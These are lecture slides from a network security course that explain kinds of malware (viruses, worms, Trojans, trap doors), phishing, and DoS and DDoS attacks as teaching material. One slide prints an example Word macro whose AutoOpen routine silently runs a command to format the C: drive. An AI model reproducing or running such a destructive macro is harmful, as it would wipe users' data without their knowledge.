Network Security

Lecture 5

Presented by: Dr. Munam Ali Shah

 Summary of the previous lecture

 In Previous lecture, we talked about security through

obscurity
 We have seen the X.800 Security architecture
 We also learnt about active and passive attacks
 And importantly, we discussed the difference between
Security and Protection. How access matrix is used to
classify objects, Domains and access-rights
 Part 2(a)
Analysis of the N/W Security
 Outlines
 Different types of security attacks in a computing
environment
 Viruses, Worms, Trojan Horses
 DoS attacks and its types
 Objectives

 To be able to distinguish between different types of

security attacks
 To identify and classify which security attacks leads to

which security breach category

Different Types of Attacks and Threats
 Virus
 Worms
 Trojan Horse
 Botnet
 Trap doors
 Logic Bomb
 Spyware
 Viruses
 A Virus infects executable programs by appending
its own code so that it is run every time the program
runs.
 Viruses
 may be destructive (by destroying/altering data)
 may be designed to “spread” only
 Although they do not carry a dangerous “payload”, they consume
resources and may cause malfunctions in programs if they are badly
written and should therefore be considered dangerous!

 Viruses have been a major threat in the past

decades but have nowadays been replaced by self-
replicating worms, spyware and adware as the no.
1 threat!
7
 Virus Types
 Boot Sector Virus
 Spreads by passing of floppy disks
 Substitutes its code for DOS boot sector or Master Boot
Record
 Used to be very common in 1980ies and 1990ies

8
 An Example of Boot Sector Virus
 Polymorphic Virus
 Virus that has the ability to “change” its own code to
avoid detection by signature scanners
 Macro Virus
 Is based on a macro programming language of a
popular application (e.g. MS Word/Excel, etc.)
 Stealth Virus
 Virus that has the ability to hide its presence from the
user. The virus may maintain a copy of the original,
uninfected data and monitor system activity

10
 Example of Macro Virus
 Visual Basic Macro to reformat hard drive
Sub AutoOpen()
Dim oFS
Set oFS =
CreateObject(’’Scripting.FileSystemObject’’
)
vs = Shell(’’c:command.com /k format
c:’’,vbHide)
End Sub
 Trap Door
 Trap Door
Trap doors, also referred to as backdoors, are
bits of code embedded in programs by the
programmer(s) to quickly gain access at a later
time.
A programmer may purposely leaves this code in
or simply forgets to remove it, a potential security
hole is introduced. Hackers often plant a backdoor
on previously compromised systems to gain later
access
 Worms
 A Worm is a piece of software that uses computer
networks (and security flaws) to create copies of itself
 First Worm in 1988: “Internet Worm“
 propagated via exploitation of several BSD and sendmail-
bugs
 infected large number of computers on the Internet
 Some “successful“ Worms
 Code Red in 2001
 Infected hundreds of thousands of systems by exploiting a vulnerability in
Microsoft‘s Internet Information Server
 Blaster in 2003
 Infected hundreds of thousands of systems by exploiting a vulnerability in
Microsoft‘s RPC service
13
Trojan Horse
 Trojan Horses
 A Trojan is (non-self-replicating program) that appears to
perform a desirable function for the user but instead facilitates
unauthorized access to the user's computer system
 It is embedded within or disguised as legitimate software
 Trojans may look interesting to the unsuspecting user, but are
harmful when actually executed
 Two types of Trojan Horses
 Useful software that has been corrupted by an attacker to
execute malicious code when the program is run
 Standalone program that masquerades as something else
(like a game, or a neat little utility) to trick the user into
running it
 Trojan Horses do not operate autonomously
15
 Types of Trojan Horses (1/2)

 Remote Access Trojans / Remote Control

Trojans
 Most dangerous types of trojans
 Enable the attacker to read every keystroke of the
victim, recover passwords, etc.
 Examples: NetBus, Sub7, BackOrifice, BO2K, …
 Proxy Trojans
 Provide a relay for an attacker so that he is able to
disguise the origin of his activities
 DDoS Zombies
 Are used for large-scale Distributed Denial of Service
attacks 16
 Types of Trojan Horses (2/2)

 Data-Sending Trojans
 Are used by attackers to gather certain data
 Passwords
 E-banking credentials
 Gathered data is often transferred to a location on the
Internet where the attacker can harvest the data later
on
 Destructive Trojans
 Trojans that perform directly harmful activity
 Altering data
 Encrypting files

17
 Phishing

 It is process of attempting to acquire sensitive

information such as usernames, password and
credit card details by masquerading as a
trustworthy entity in an electronic communication
 Defenses Against Phishing
 Number one defense is raising user awareness and user education
 Very few effective technical countermeasures to completely stop phishing

18
 Denial of Service (DoS) Attacks

 Denial of Service attacks are an attempt to make

computer resources unavailable to their intended
users
 DoS attacks are (normally) not highly
sophisticated, but merely bothersome
 Force administrator to restart service or reboot machine
 DoS attacks are dangerous for businesses that rely
on availability (e.g. Webshops, eGovernment
platforms, etc.)

19
Categories of Denial of Service Attacks

Stopping Exhausting
services resources
Attack Locally - Process killing - Forking process to
is - System fill process table
Launch reconfiguring - Filling up the file
system
Remotely - Malfunction - Packet flood (e.g.
packet attack SYN flood, Smurf )

20
 DoS: Stopping Services (locally)

 Easy if an attacker has already gained root-

access, he could simply …
 shutdown the service
 reconfigure the service
 If an attacker has a “normal“ account on the
system, he could
 try to “become root“ using an exploit to perform any of
the activities listed above

21
 DoS: Exhausting Resources (Locally )

 An attacker might try to run a program that grabs

resources on the target machine itself
 Most operating systems attempt to isolate users to
prevent one user from grabbing all system resources
 Intruders often find ways around these attempts (or
may try to “become root“ by using an exploit)
 Common methods of exhausting resources
– Filling up the process table
– Filling up the file system
– Sending traffic that fills up the communications
list
22
 DoS: Stopping Services (Remotely)
 Much more popular than local DoS attacks, because the
attacker does not need a local account on the target
machine
 Often a “malformed packet“ attack, that relies on errors
in the TCP/IP stack or network protocol of an application
and causes the remote machine (or just the application)
to crash

23
 DoS: Exhausting Resources
(Remotely)
 An attacker tries tying up all resources of the
target system (particularly the communications
link)
 Popular example: SYN-Flood
 During a SYN-Flood an attacker will send a lot of SYN
packets with a spoofed (and unresponsive) source
address to the target and never complete the
handshake to fill up the connection queue or the
communication link (and cause a DoS)

24
 DDoS
 DDoS attack terminology
 Attacking machines are called daemons, slaves,
zombies or agents.
 “Zombies” are usually poorly secured machines that
are exploited (Also called agents)
 Machines that control and command the zombies are
called masters or handlers.
 Attacker would like to hide trace: He hides himself
behind machines that are called stepping stones.

25
 Great Programming Required?
 Remember !!
 The hackers and attackers are expert level
programmers
 They now most of the programming concepts
 They simply find the loopholes in the system to exploit
the opportunity to break-in the system.
 To become resilient against threats and to know the
programming level of attackers, and to determine the
bug,
YES great programming is required.
 Summary of today’s lecture
 In today’s lecture, we discussed in detail about different
types of security attacks that a computer system is/can
be vulnerable to.
 Our discussion included some famous attacks such as
virus, worms, DoS, Trojan horse etc.
 Next lecture topics
 We will have our discussion continued on DoS attacks.
 We will see how DoS attacks can cost million of $$$$ to
a company
 We will explore more types and sub-types of DoS
attacks.
The End